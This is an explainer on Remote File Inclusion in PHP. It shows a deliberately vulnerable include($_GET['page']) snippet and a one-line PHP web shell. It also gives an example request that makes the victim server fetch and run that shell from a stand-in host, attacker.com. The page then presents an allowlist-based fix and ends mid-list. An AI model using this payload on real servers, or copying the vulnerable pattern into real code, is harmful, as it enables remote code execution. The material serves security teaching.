Remote File Inclusion (RFI) is a vulnerability where an application includes files from remote URLs based on user input, allowing attackers to include and execute malicious code hosted on external servers.
When an application's file inclusion mechanism accepts URLs and remote file access is enabled (e.g., PHP's allow_url_include), attackers can specify a URL to their malicious script, which gets fetched and executed by the server.
// PHP - vulnerable (requires allow_url_include=On)
$page = $_GET['page'];
include($page);
// Attack: ?page=http://attacker.com/shell.txt
// The remote file gets fetched and executed as PHP
# Attacker hosts malicious PHP on their server:
# http://attacker.com/shell.txt contains:
<?php system($_GET['cmd']); ?>
# Victim request:
GET /index.php?page=http://attacker.com/shell.txt&cmd=id
# The victim server fetches and executes the remote code
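The fix is to stop passing user input to include() at all: the request parameter becomes a key into a fixed allowlist of local files, so URLs, stream wrappers and traversal strings never reach the include mechanism. The following is an added example (not code from the original page); the page names and the pages/ directory are assumptions.

```php
<?php
// Hardened counterpart to the vulnerable include($_GET['page']) shown above.
// The user-supplied value is only ever used as an array key, never as a path
// or URL, so allow_url_include makes no difference to this code.

// Allowlist: request value => local template (paths are constructed examples).
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Resolve a user-supplied page name to an allowlisted local file.
 * Returns null for anything not in the allowlist, which covers remote URLs
 * (http://...), stream wrappers (php://, data://) and ../ traversal alike.
 */
function resolvePage(string $requested): ?string
{
    // Strict key lookup: unknown values are rejected without being interpreted.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $path = __DIR__ . '/' . PAGES[$requested];

    // Defence in depth: the resolved file must exist and must stay below __DIR__,
    // so a misconfigured allowlist entry cannot point outside the web root.
    $real   = realpath($path);
    $prefix = __DIR__ . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

$page = $_GET['page'] ?? 'home';
$file = resolvePage($page);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Keep allow_url_include=Off in php.ini as well; the allowlist makes the code safe regardless of that setting, and the setting limits the damage if another include elsewhere is less careful.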
PHP settings involved:
allow_url_fopen = On (default On)
allow_url_include = On (default Off since PHP 5.2)
RFI is less common today because allow_url_include is disabled by default in modern PHP. However, it still occurs in: